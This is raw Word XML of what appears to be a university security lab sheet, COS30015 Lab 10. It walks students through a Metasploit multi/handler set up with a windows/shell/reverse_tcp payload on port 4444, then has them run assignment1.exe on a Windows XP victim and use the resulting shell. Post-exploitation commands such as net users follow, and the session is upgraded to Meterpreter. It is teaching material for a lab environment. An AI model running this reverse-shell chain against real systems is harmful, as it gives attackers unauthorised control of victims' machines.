    <w:p w14:paraId="10C241FA" w14:textId="77777777" w:rsidR="00F53E86" w:rsidRPr="006F0C65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earch exploit handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0769D1A4" w14:textId="77777777" w:rsidR="00F53E86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u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 multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019C2E70" w14:textId="77777777" w:rsidR="005C0EF7" w:rsidRPr="00BB5AFE" w:rsidRDefault="003157E9" w:rsidP="005C0EF7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30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00021C27">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:i/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>prompt should be:</w:t>
      </w:r>
      <w:r w:rsidRPr="00021C27">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005C0EF7"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>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005C0EF7"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 xml:space="preserve"> exploit(</w:t>
      </w:r>
      <w:r w:rsidR="005C0EF7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:highlight w:val="black"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>handler</w:t>
      </w:r>
      <w:r w:rsidR="005C0EF7"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>) &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAE3875" w14:textId="77777777" w:rsidR="005C0EF7" w:rsidRPr="006F0C65" w:rsidRDefault="005C0EF7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39B8BC11" w14:textId="77777777" w:rsidR="00F53E86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et payload windows/shell/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reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7F13BC20" w14:textId="77777777" w:rsidR="00D333BF" w:rsidRPr="006F0C65" w:rsidRDefault="003157E9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noProof/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30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B9306C" wp14:editId="3E836392">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3800723</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>81059</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2223770" cy="782320"/>
                <wp:effectExtent l="2381250" t="0" r="24130" b="17018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782320"/>
                        </a:xfrm>
                        <a:prstGeom prst="wedgeRoundRectCallout">
                          <a:avLst>
                            <a:gd name="adj1" fmla="val -155118"/>
                            <a:gd name="adj2" fmla="val 6640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A7DFC" w14:textId="77777777" w:rsidR="003157E9" w:rsidRDefault="003157E9" w:rsidP="003157E9">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t>Verify that the LPORT is 4444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9306C" id="Rounded Rectangular Callout 15" o:spid="_x0000_s1037" type="#_x0000_t62" style="position:absolute;margin-left:299.25pt;margin-top:6.4pt;width:175.1pt;height:6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" adj="-22705,25143" fillcolor="#5b9bd5 [3204]" strokecolor="#1f4d78 [1604]" strokeweight="1pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="267A7DFC" w14:textId="77777777" w:rsidR="003157E9" w:rsidRDefault="003157E9" w:rsidP="003157E9">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t>Verify that the LPORT is 4444</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="332523AB" w14:textId="77777777" w:rsidR="00F53E86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et LHOST</w:t>
      </w:r>
      <w:r w:rsidR="005C0EF7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192.168.100.200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D61D54" w14:textId="77777777" w:rsidR="00D333BF" w:rsidRPr="006F0C65" w:rsidRDefault="00840B4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set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3000EC" w14:textId="77777777" w:rsidR="003157E9" w:rsidRDefault="003157E9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5BA03CAB" w14:textId="77777777" w:rsidR="003157E9" w:rsidRDefault="003157E9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show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D444B48" w14:textId="77777777" w:rsidR="003157E9" w:rsidRDefault="003157E9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3008D6DC" w14:textId="77777777" w:rsidR="00F53E86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xploit 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softHyphen/>
      </w:r>
      <w:r w:rsidR="00F53E86" w:rsidRPr="006F0C65">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>‐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j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E277742" w14:textId="77777777" w:rsidR="001D0D0F" w:rsidRPr="006F0C65" w:rsidRDefault="00E24C8B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noProof/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30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8FA4B1" wp14:editId="0EADED2D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3689405</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>66868</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2223770" cy="782320"/>
                <wp:effectExtent l="762000" t="0" r="24130" b="18923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782320"/>
                        </a:xfrm>
                        <a:prstGeom prst="wedgeRoundRectCallout">
                          <a:avLst>
                            <a:gd name="adj1" fmla="val -82534"/>
                            <a:gd name="adj2" fmla="val 684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B2349" w14:textId="77777777" w:rsidR="00E24C8B" w:rsidRDefault="00E24C8B" w:rsidP="00E24C8B">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t>Do this from 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FA4B1" id="Rounded Rectangular Callout 12" o:spid="_x0000_s1038" type="#_x0000_t62" style="position:absolute;margin-left:290.5pt;margin-top:5.25pt;width:175.1pt;height:6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" adj="-7027,25582" fillcolor="#5b9bd5 [3204]" strokecolor="#1f4d78 [1604]" strokeweight="1pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="634B2349" w14:textId="77777777" w:rsidR="00E24C8B" w:rsidRDefault="00E24C8B" w:rsidP="00E24C8B">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t>Do this from XP</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1707CE" w14:textId="77777777" w:rsidR="003157E9" w:rsidRPr="001D0D0F" w:rsidRDefault="00F53E86" w:rsidP="003157E9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18) </w:t>
      </w:r>
      <w:r w:rsidR="003157E9" w:rsidRPr="001D0D0F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>Run shell as if you were a user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9321BC" w14:textId="77777777" w:rsidR="003157E9" w:rsidRDefault="003157E9" w:rsidP="003157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In Windows XP, in the web browser, Click on </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0081F01C" w14:textId="77777777" w:rsidR="003157E9" w:rsidRDefault="003157E9" w:rsidP="003157E9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D333BF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>assignment1.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E5083D" w14:textId="77777777" w:rsidR="003157E9" w:rsidRDefault="003157E9" w:rsidP="003157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050127">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>Select OPEN in the file dialogue box</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5479CA20" w14:textId="77777777" w:rsidR="00F53E86" w:rsidRPr="001D0D0F" w:rsidRDefault="00F53E86" w:rsidP="003157E9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19) Check running user</w:t>
      </w:r>
      <w:r w:rsidR="00834FAD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (in Kali)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4C1B48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session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connected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you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get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notification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session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connected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which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session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connected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05BF7FA9" w14:textId="77777777" w:rsidR="003157E9" w:rsidRPr="006F0C65" w:rsidRDefault="003157E9" w:rsidP="003157E9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lastRenderedPageBreak/>
        <w:t>sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E913C74" w14:textId="77777777" w:rsidR="00F53E86" w:rsidRPr="00F53E86" w:rsidRDefault="003157E9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050127">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t xml:space="preserve">//If </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>an</w:t>
      </w:r>
      <w:r w:rsidRPr="00050127">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t xml:space="preserve"> error comes up run the executable again</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C9019C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info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access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session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</w:p>
    <w:p w14:paraId="6E4FA4D8" w14:textId="77777777" w:rsidR="00F53E86" w:rsidRPr="006F0C65" w:rsidRDefault="003157E9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  <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251686912" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="417086C7" wp14:editId="14EF5950">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3355450</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>48288</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3005620" cy="1024995"/>
            <wp:effectExtent l="0" t="0" r="4445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20" cy="102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C65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essions –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E24C8B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>i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&lt;Id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0073F73F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should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drop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you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windows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</w:t>
      </w:r>
      <w:r w:rsidR="00E24C8B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  <w:r w:rsidR="003157E9" w:rsidRPr="003157E9"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  <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE0DA44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Let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also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know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here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C224D40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6F1B4F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4AFA80DE" w14:textId="77777777" w:rsidR="00F53E86" w:rsidRPr="006F0C65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cho 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haxord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&gt; readme.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072E9ECA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should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called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readme.txt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desktop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6F1B4F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>XP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machine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228E7291" w14:textId="77777777" w:rsidR="006F1B4F" w:rsidRDefault="006F1B4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Try a few DOS commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCDED95" w14:textId="77777777" w:rsidR="006F1B4F" w:rsidRPr="006F1B4F" w:rsidRDefault="006F1B4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6F1B4F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>tasklist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="70203CDA" w14:textId="77777777" w:rsidR="006F1B4F" w:rsidRPr="006F1B4F" w:rsidRDefault="006F1B4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1B4F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>net users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCB5B3A" w14:textId="77777777" w:rsidR="006F1B4F" w:rsidRDefault="006F1B4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1B4F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>netstat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5777866D" w14:textId="77777777" w:rsidR="003157E9" w:rsidRPr="006F1B4F" w:rsidRDefault="003157E9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help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6CF2F2" w14:textId="77777777" w:rsidR="006F1B4F" w:rsidRDefault="006F1B4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noProof/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30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1FD72" wp14:editId="27A4DEC6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4030675</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>10668</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2223770" cy="782320"/>
                <wp:effectExtent l="1905000" t="0" r="24130" b="17780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782320"/>
                        </a:xfrm>
                        <a:prstGeom prst="wedgeRoundRectCallout">
                          <a:avLst>
                            <a:gd name="adj1" fmla="val -133665"/>
                            <a:gd name="adj2" fmla="val 4099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91BF6" w14:textId="77777777" w:rsidR="006F1B4F" w:rsidRDefault="006F1B4F" w:rsidP="006F1B4F">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">You will need to kill the shell (Ctrl + C), run the exploit again and run the file from XP again.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1FD72" id="Rounded Rectangular Callout 14" o:spid="_x0000_s1039" type="#_x0000_t62" style="position:absolute;margin-left:317.4pt;margin-top:.85pt;width:175.1pt;height:6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" adj="-18072,19655" fillcolor="#5b9bd5 [3204]" strokecolor="#1f4d78 [1604]" strokeweight="1pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0BC91BF6" w14:textId="77777777" w:rsidR="006F1B4F" w:rsidRDefault="006F1B4F" w:rsidP="006F1B4F">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">You will need to kill the shell (Ctrl + C), run the exploit again and run the file from XP again. </w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B0DE3E" w14:textId="77777777" w:rsidR="001D0D0F" w:rsidRPr="00F53E86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694AD06E" w14:textId="77777777" w:rsidR="00F53E86" w:rsidRPr="001D0D0F" w:rsidRDefault="001D0D0F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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>Setp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t xml:space="preserve"> 20) </w:t>
      </w:r>
      <w:r w:rsidR="00F53E86" w:rsidRPr="001D0D0F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>Extra task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762AF8FB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Upgrade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</w:t>
      </w:r>
      <w:r w:rsidR="006F1B4F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. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699E9A09" w14:textId="77777777" w:rsidR="006F1B4F" w:rsidRPr="00F53E86" w:rsidRDefault="006F1B4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048837FF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Meterpreter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advanced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allows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more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6F1B4F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flexibility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standard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capability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upgrade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pre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softHyphen/>
      </w:r>
      <w:r w:rsidRPr="00F53E86">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>‐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existing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sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D8D440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3153984E" w14:textId="77777777" w:rsidR="00F53E86" w:rsidRPr="006F0C65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essions –u &lt;Id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F06C851" w14:textId="77777777" w:rsidR="00222A8F" w:rsidRPr="00F53E86" w:rsidRDefault="00222A8F" w:rsidP="00F53E86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00222A8F" w:rsidRPr="00F53E8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57087" w14:textId="77777777" w:rsidR="0089707F" w:rsidRDefault="0089707F" w:rsidP="00F53E86">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="50C5FA89" w14:textId="77777777" w:rsidR="0089707F" w:rsidRDefault="0089707F" w:rsidP="00F5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44852" w14:textId="77777777" w:rsidR="00852683" w:rsidRPr="00CC763A" w:rsidRDefault="00852683" w:rsidP="00852683">
    <w:pPr>
      <w:pStyle w:val="a6"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:i/>
      </w:rPr>
      <w:t>COS30015</w:t>
    </w:r>
    <w:r w:rsidRPr="00E2101B">
      <w:rPr>
        <w:i/>
      </w:rPr>
      <w:t xml:space="preserve"> Lab </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:i/>
      </w:rPr>
      <w:t>10</w:t>
    </w:r>
    <w:r w:rsidRPr="00E2101B">
      <w:rPr>
        <w:i/>
      </w:rPr>
      <w:t xml:space="preserve"> (week </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:i/>
      </w:rPr>
      <w:t>11</w:t>
    </w:r>
    <w:r w:rsidRPr="00E2101B">
      <w:rPr>
        <w:i/>
      </w:rPr>
      <w:t>)</w:t>
    </w:r>
    <w:r w:rsidRPr="00CC763A">
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r>
      <w:tab/>
    </w:r>
    <w:r>
      <w:tab/>
    </w:r>
    <w:r w:rsidRPr="00CC763A">
      <w:rPr>
        <w:i/>
      </w:rPr>
      <w:t>P</w:t>
    </w:r>
    <w:r w:rsidRPr="00CC763A">
      <w:rPr>
        <w:rStyle w:val="aa"/>
        <w:i/>
      </w:rPr>
      <w:t xml:space="preserve">age </w:t>
    </w:r>
    <w:r w:rsidRPr="00CC763A">
      <w:rPr>
        <w:rStyle w:val="aa"/>
        <w:i/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidRPr="00CC763A">
      <w:rPr>
        <w:rStyle w:val="aa"/>
        <w:i/>
      </w:rPr>
      <w:instrText xml:space="preserve">PAGE  </w:instrText>
    </w:r>
    <w:r w:rsidRPr="00CC763A">
      <w:rPr>
        <w:rStyle w:val="aa"/>
        <w:i/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="003157E9">
      <w:rPr>
        <w:rStyle w:val="aa"/>
        <w:i/>
        <w:noProof/>
      </w:rPr>
      <w:t>7</w:t>
    </w:r>
    <w:r w:rsidRPr="00CC763A">
      <w:rPr>
        <w:rStyle w:val="aa"/>
        <w:i/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="6D473CDD" w14:textId="77777777" w:rsidR="00477EF2" w:rsidRDefault="00477E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C1C82" w14:textId="77777777" w:rsidR="0089707F" w:rsidRDefault="0089707F" w:rsidP="00F53E86">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1C64F33C" w14:textId="77777777" w:rsidR="0089707F" w:rsidRDefault="0089707F" w:rsidP="00F53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2E1A6" w14:textId="77777777" w:rsidR="00A002CB" w:rsidRDefault="0089707F">
    <w:pPr>
      <w:pStyle w:val="a4"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:pict w14:anchorId="78F008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23146" o:spid="_x0000_s2050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18A8C" w14:textId="77777777" w:rsidR="00F53E86" w:rsidRDefault="0089707F" w:rsidP="00852683">
    <w:pPr>
      <w:pStyle w:val="a4"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:pict w14:anchorId="2B8A33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23147" o:spid="_x0000_s2051" type="#_x0000_t136" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:445.4pt;height:190.8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solutions"/>
          <w10:wrap anchorx="margin" anchory="margin"/>
        </v:shape>
      </w:pict>
    </w:r>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="-255898335"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Page Numbers (Top of Page)"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:r w:rsidR="00852683" w:rsidRPr="00E2101B">
          <w:rPr>
            <w:b/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:t>Name: ______________________________________ Student ID:___</w:t>
        </w:r>
        <w:r w:rsidR="00852683">
          <w:rPr>
            <w:b/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:t>______________</w:t>
        </w:r>
        <w:r w:rsidR="00852683">
          <w:rPr>
            <w:b/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00852683">
          <w:t xml:space="preserve">Page </w:t>
        </w:r>
        <w:r w:rsidR="00852683">
          <w:rPr>
            <w:b/>
            <w:bCs/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00852683">
          <w:rPr>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGE </w:instrText>
        </w:r>
        <w:r w:rsidR="00852683">
          <w:rPr>
            <w:b/>
            <w:bCs/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="003157E9">
          <w:rPr>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
        <w:r w:rsidR="00852683">
          <w:rPr>
            <w:b/>
            <w:bCs/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
        <w:r w:rsidR="00852683">
          <w:t xml:space="preserve"> of </w:t>
        </w:r>
        <w:r w:rsidR="00852683">
          <w:rPr>
            <w:b/>
            <w:bCs/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00852683">
          <w:rPr>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:instrText xml:space="preserve"> NUMPAGES  </w:instrText>
        </w:r>
        <w:r w:rsidR="00852683">
          <w:rPr>
            <w:b/>
            <w:bCs/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="003157E9">
          <w:rPr>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
        <w:r w:rsidR="00852683">
          <w:rPr>
            <w:b/>
            <w:bCs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44EE5" w14:textId="77777777" w:rsidR="00A002CB" w:rsidRDefault="0089707F">
    <w:pPr>
      <w:pStyle w:val="a4"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:pict w14:anchorId="6FF641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23145" o:spid="_x0000_s2049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solution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21"/>
    <w:rsid w:val="00041588"/>
    <w:rsid w:val="00086F01"/>
    <w:rsid w:val="000975CD"/>
    <w:rsid w:val="00174DE7"/>
    <w:rsid w:val="00177AE9"/>
    <w:rsid w:val="00187DFF"/>
    <w:rsid w:val="001D0D0F"/>
    <w:rsid w:val="001F1037"/>
    <w:rsid w:val="00222A8F"/>
    <w:rsid w:val="00276483"/>
    <w:rsid w:val="002D2735"/>
    <w:rsid w:val="00303ED2"/>
    <w:rsid w:val="003157E9"/>
    <w:rsid w:val="00372C1F"/>
    <w:rsid w:val="003D5B98"/>
    <w:rsid w:val="003E0A5A"/>
    <w:rsid w:val="00477EF2"/>
    <w:rsid w:val="00524118"/>
    <w:rsid w:val="0059437A"/>
    <w:rsid w:val="005C0EF7"/>
    <w:rsid w:val="00604DFF"/>
    <w:rsid w:val="00624674"/>
    <w:rsid w:val="006B723D"/>
    <w:rsid w:val="006F0C65"/>
    <w:rsid w:val="006F1B4F"/>
    <w:rsid w:val="00714A0A"/>
    <w:rsid w:val="00743532"/>
    <w:rsid w:val="00746B47"/>
    <w:rsid w:val="00784C7E"/>
    <w:rsid w:val="007F5945"/>
    <w:rsid w:val="00834FAD"/>
    <w:rsid w:val="00840B4A"/>
    <w:rsid w:val="00852683"/>
    <w:rsid w:val="00856BB6"/>
    <w:rsid w:val="0089707F"/>
    <w:rsid w:val="008E323D"/>
    <w:rsid w:val="009119B0"/>
    <w:rsid w:val="009442B6"/>
    <w:rsid w:val="009C55BA"/>
    <w:rsid w:val="009E0E6A"/>
    <w:rsid w:val="009E3E0E"/>
    <w:rsid w:val="00A002CB"/>
    <w:rsid w:val="00A644B7"/>
    <w:rsid w:val="00AB450F"/>
    <w:rsid w:val="00AF6558"/>
    <w:rsid w:val="00B37FBD"/>
    <w:rsid w:val="00B57908"/>
    <w:rsid w:val="00BB2C7D"/>
    <w:rsid w:val="00BB5AFE"/>
    <w:rsid w:val="00BE09D4"/>
